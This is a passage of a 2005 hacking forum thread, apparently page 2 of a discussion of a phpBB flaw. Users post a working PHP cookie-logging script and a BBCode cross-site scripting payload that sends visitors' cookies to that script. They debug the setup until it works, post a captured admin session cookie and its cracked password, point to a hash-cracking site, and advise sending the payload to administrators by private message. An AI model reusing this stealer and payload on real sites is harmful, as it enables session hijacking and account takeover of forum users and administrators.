 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 74
 Members: 0
 Total: 74
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 Posted: Sun Jul 10, 2005 1:05 pm |
 |
|
| subzero |
| Valuable expert |
 |
|
| Joined: Mar 16, 2005 |
| Posts: 42 |
|
|
|
 |
|
 |
|
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /redirectpage.html");
?>
how about this one ?
rename it to cookies.php
and try to access it by http://mysite.com/cookies.php
and see what you have inside http://mysite.com/cookies.txt
;0 |
|
|
|
|
| Posted: Sun Jul 10, 2005 1:14 pm |
|
|
| subzero |
| Valuable expert |
|
|
| Joined: Mar 16, 2005 |
| Posts: 42 |
|
|
|
|
|
|
|
using the code above.. rename it to cookies.php.. or what ever you want.
| Code: | | [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color] |
have fun |
|
|
|
|
|
|
|
|
| Posted: Sun Jul 10, 2005 1:15 pm |
|
|
| verbatim |
| Regular user |
 |
|
| Joined: Jul 09, 2005 |
| Posts: 11 |
|
|
|
|
|
|
|
when i call http://mysite.com/cookies.php
there's in cookies.txt :
| Code: | | Cookie: <br> IP: [color=#FF0000]myIP[/color]<br> Date and Time: 10 July, 2005, 3:11 pm<br> Referer: <br><br><br> |
but when i try to use the exploit with this new cookies.php :
| Quote: | | [url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite.com/cookies.php'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]' |
the cookies.txt is empty 
edit : i tried the syntax you gave while i was posting :
| Code: | | [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color] |
An now it's working, great job subzero, i'd say you're certainly above (zero  ). |
|
|
|
|
|
|
|
|
| Posted: Sun Jul 10, 2005 1:30 pm |
|
|
| subzero |
| Valuable expert |
|
|
| Joined: Mar 16, 2005 |
| Posts: 42 |
|
|
|
|
|
|
|
Good then
only diff for that code was cookies.php?c=
happy hunting ;P pal |
|
|
|
|
| Posted: Sun Jul 10, 2005 2:25 pm |
|
|
| WaterBird |
| Active user |
|
|
| Joined: May 16, 2005 |
| Posts: 37 |
|
|
|
|
|
|
|
Ok i have something like this
REFERER=http://www.site.net/nothing/phpBB2/viewtopic.php?t=2
QUERY=phpbb2mysql_t=a:2:{i:1;i:1121004937;i:2;i:1121005196;}; phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"c2150783216c11afea291d179e7b1902";s:6:"userid";s:1:"2";}; phpbb2mysql_sid=b57ae9f7898f1ccebf7e07fa427e5998
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
now what ? by what program/viewer i can use this cookie ?
c2150783216c11afea291d179e7b1902 is md5 hash ? |
|
Last edited by WaterBird on Sun Jul 10, 2005 2:39 pm; edited 1 time in total |
|
|
|
| Posted: Sun Jul 10, 2005 2:37 pm |
|
|
| verbatim |
| Regular user |
|
|
| Joined: Jul 09, 2005 |
| Posts: 11 |
|
|
|
|
|
|
|
| the password of this user : dupa400 |
|
|
|
|
| Posted: Sun Jul 10, 2005 2:40 pm |
|
|
| WaterBird |
| Active user |
|
|
| Joined: May 16, 2005 |
| Posts: 37 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Sun Jul 10, 2005 2:51 pm |
|
|
| verbatim |
| Regular user |
|
|
| Joined: Jul 09, 2005 |
| Posts: 11 |
|
|
|
|
|
|
|
a "jpg cookie stealer" can't exist, because jpg is no executable... i presume antichat.ru redirectq (with .htaccess) http://antichat.ru/cgi-bin/s.jpg to the real stealer script.
if you want to use your own stealer script, you just have to read my discussion with subzero, the answer is in. |
|
|
|
|
|
|
|
|
| Posted: Sun Jul 10, 2005 2:57 pm |
|
|
| WaterBird |
| Active user |
|
|
| Joined: May 16, 2005 |
| Posts: 37 |
|
|
|
|
|
|
|
| verbatim wrote: | a "jpg cookie stealer" can't exist, because jpg is no executable... i presume antichat.ru redirectq (with .htaccess) http://antichat.ru/cgi-bin/s.jpg to the real stealer script.
if you want to use your own stealer script, you just have to read my discussion with subzero, the answer is in. |
Yep i have try that one my cookie is empty !
Done the php file with
| Code: |
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /redirectpage.html");
?>
|
in same directory/path created empty cookies.txt file with CHMOD 777
and in post i add
| Code: |
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.site.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
|
And when i see the post on admin account file cookies.txt is still empty. Any ideas ? |
|
|
|
|
|
|
|
|
| Posted: Sun Jul 10, 2005 3:10 pm |
|
|
| subzero |
| Valuable expert |
|
|
| Joined: Mar 16, 2005 |
| Posts: 42 |
|
|
|
|
|
|
|
i think you using mozilla ?? others than IE ?
i have no problem to see my own hash and im sure verbatism dont have problem too
about the hash pass.
found an online site that do cracking for u.
http://sarcaprj.wayreth.eu.org/ |
|
|
|
|
|
|
|
|
| Posted: Sun Jul 10, 2005 3:13 pm |
|
|
| WaterBird |
| Active user |
|
|
| Joined: May 16, 2005 |
| Posts: 37 |
|
|
|
|
|
|
|
| subzero wrote: | i think you using mozilla ?? others than IE ?
i have no problem to see my own hash and im sure verbatism dont have problem too
about the hash pass.
found an online site that do cracking for u.
http://sarcaprj.wayreth.eu.org/ |
Thx for hash pass cracker but i still don't understand why this php don;t wan't to work i have entered it by typing the url in to my ie and i get:
| Code: |
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@site.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
--------------------------------------------------------------------------------
Apache/1.3.33 Server at www.site.com Port 80
|
server nfo
| Code: |
Operating system FreeBSD
Service Status Click to View
Kernel version 4.11-STABLE
Machine Type i386
Apache version 1.3.33 (Unix)
PERL version 5.8.5
Path to PERL /usr/bin/perl
Path to sendmail /usr/sbin/sendmail
Installed Perl Modules Click to View
PHP version 4.3.10
MySQL version 4.0.18
cPanel Build 10.2.0-CURRENT 89
Theme cPanel X v2.5.0
Documentation Click to View
cPanel Pro 1.0 (RC26)
|
|
|
|
|
|
|
|
|
|
| Posted: Sun Jul 10, 2005 3:32 pm |
|
|
| subzero |
| Valuable expert |
|
|
| Joined: Mar 16, 2005 |
| Posts: 42 |
|
|
|
|
|
|
|
| Code: |
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?> |
rename to cookies.php
and make new one cookies.txt
with chmod 777 inside the same directory.
i put mine in root directory /
mmm good luck. |
|
|
|
|
| Posted: Sun Jul 10, 2005 3:52 pm |
|
|
| WaterBird |
| Active user |
|
|
| Joined: May 16, 2005 |
| Posts: 37 |
|
|
|
|
|
|
|
ok i have put this php file in root directory and it's working thx :}
Btw to all intrested maybe you know it but you don't have to post in topic or do a new one you can just send a msg to admin and paste the code in the msg :}
Cheers and thx for help !! Many thx ! |
|
|
|
|
| Posted: Sun Jul 10, 2005 5:39 pm |
|
|
| WaterBird |
| Active user |
|
|
| Joined: May 16, 2005 |
| Posts: 37 |
|
|
|
|
|
|
|
| Btw any idea how to fix this hole ? Phpbb don't know about it yet ? |
|
|
|
|
| Posted: Sun Jul 10, 2005 5:48 pm |
|
|
| 700G |
| Active user |
|
|
| Joined: Mar 25, 2005 |
| Posts: 33 |
|
|
|
|
|
|
|
Works very good  |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 2 of 8
Goto page Previous1, 2, 3, 4, 5, 6, 7, 8Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
